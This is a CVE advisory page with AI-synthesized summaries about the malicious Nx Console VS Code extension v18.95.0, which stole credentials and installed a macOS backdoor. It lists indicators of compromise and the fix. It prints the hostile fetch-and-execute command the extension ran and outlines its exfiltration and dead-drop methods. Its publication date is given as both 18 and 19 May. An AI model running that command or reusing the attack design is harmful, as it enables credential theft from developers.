CVE-2026-48027
Description
Nx Console is the user interface for Nx & Lerna. On 19 May 2026, a malicious version of Nx Console, 18.95.0, was published at 12:30 PM UTC and removed soon after at 12:48 PM UTC, leaving it available for ~18 minutes in Visual Studio Marketplace. For OpenVSX, the problem was detected later, and the compromised version was available from 12:33 UTC to 13:09 UTC (~36 minutes). Version 18.100.0 of Nx Console is not compromised and users may remediate by upgrading to that version.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Nx Console VS Code extension v18.95.0 was compromised for ~18 minutes, delivering a credential-stealing payload; upgrade to v18.100.0+ immediately.
Vulnerability
A malicious version of the Nx Console VS Code extension (nrwl.angular-console), version 18.95.0, was published to the Visual Studio Marketplace and OpenVSX on 2026-05-18. The extension automatically executed an obfuscated payload (498 KB) from a dangling commit in the official nrwl/nx repository as soon as a developer opened any workspace. The compromise originated from a stolen contributor's GitHub CLI OAuth token, which was exfiltrated seven days earlier via the TanStack supply-chain compromise [1][2][3].
Exploitation
The attacker used a stolen contributor token to publish the malicious extension. No additional user interaction was required beyond having auto-update enabled or manually installing 18.95.0. Within seconds of opening a workspace, the extension fetched and executed the payload, which was a multi-stage credential stealer and backdoor [1][2].
Impact
The payload harvested tokens and secrets from GitHub, npm, AWS, HashiCorp Vault, Kubernetes, and 1Password, exfiltrating them over HTTPS, GitHub API, and DNS tunneling. It also installed a persistent Python backdoor on macOS using a LaunchAgent. Any system with 18.95.0 installed during the exposure window (2026-05-18 12:30–13:09 UTC) should be considered fully compromised [1][2][3].
Mitigation
Version 18.100.0 (and later 18.100.5) is safe. Users must upgrade immediately. If 18.95.0 was installed during the exposure window, treat the machine as compromised, rotate all credentials, and check for indicators of compromise (e.g., ~/.local/share/kitty/cat.py, ~/Library/LaunchAgents/com.user.kitty-monitor.plist). No workaround exists; the malicious version has been removed from all marketplaces [2][3].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2(expand)+ 1 more
- (no CPE)
- (no CPE)range: = 18.95.0
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"A stolen contributor GitHub token was used to publish a malicious VS Code extension version (18.95.0) that fetches and executes an obfuscated credential-stealing payload from an orphan commit hidden in the official nrwl/nx repository."
Attack vector
An attacker used a stolen contributor GitHub token to publish nrwl.angular-console v18.95.0 to the VS Code Marketplace [ref_id=1]. Within seconds of a developer opening any workspace, the injected code in main.js runs a hidden VS Code Task that executes `npx -y github:nrwl/nx#558b09d7` [ref_id=1]. This fetches an orphan commit containing a 498 KB obfuscated JavaScript payload that self-daemonizes, harvests credentials from GitHub, npm, AWS, Vault, Kubernetes, 1Password, and the filesystem, then exfiltrates them over HTTPS, GitHub API, and DNS tunneling [ref_id=1]. The payload also installs a persistent Python backdoor on macOS using a GitHub Search API dead-drop for C2 [ref_id=1].
Affected code
The malicious extension v18.95.0 had 2,777 bytes of injected code at byte offset 7,703,700 in the minified main.js file [ref_id=1]. The injected code calls function Efn(td) from the extension's activate() entry point, which creates a hidden VS Code Task to fetch the payload from orphan commit 558b09d7 in the nrwl/nx repository [ref_id=1]. The orphan commit replaces the monorepo root with a package.json and a 498 KB obfuscated index.js payload [ref_id=1].
What the fix does
The Nx team removed the malicious v18.95.0 from the marketplace within 11 minutes of detection [ref_id=1]. Version 18.100.0 of Nx Console is not compromised and users should upgrade to that version [ref_id=1]. The root cause was a stolen contributor GitHub token scraped during a prior supply chain attack, which the advisory states was used to push an orphan commit and publish the malicious extension [ref_id=1]. No patch diff is available; the remediation is to avoid v18.95.0 entirely and upgrade to the safe v18.100.0 [ref_id=1].
Preconditions
- configVictim must have Nx Console v18.95.0 installed from the VS Code Marketplace
- inputVictim must open any workspace in VS Code to trigger extension activation
- authAttacker must have obtained a contributor GitHub token with push access to nrwl/nx and VS Code Marketplace publishing credentials
- networkNetwork access required for the extension to fetch the orphan commit from GitHub and for payload exfiltration
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- www.stepsecurity.io/blog/nx-console-vs-code-extension-compromisednvdExploitThird Party Advisory
- github.com/nrwl/nx-console/security/advisories/GHSA-c9j4-9m59-847wnvdMitigationVendor Advisory
- nx.dev/blog/nx-console-v18-95-0-postmortemnvdVendor Advisory
- github.com/nrwl/nx-console/issues/3139nvdIssue Tracking
- www.cisa.gov/known-exploited-vulnerabilities-catalognvdUS Government Resource
News mentions
2- GitHub Breach Traced to Malicious 'Nx Console' VS Code ExtensionInfosecurity Magazine · May 21, 2026
- CISA Adds Three Known Exploited Vulnerabilities to CatalogCISA Alerts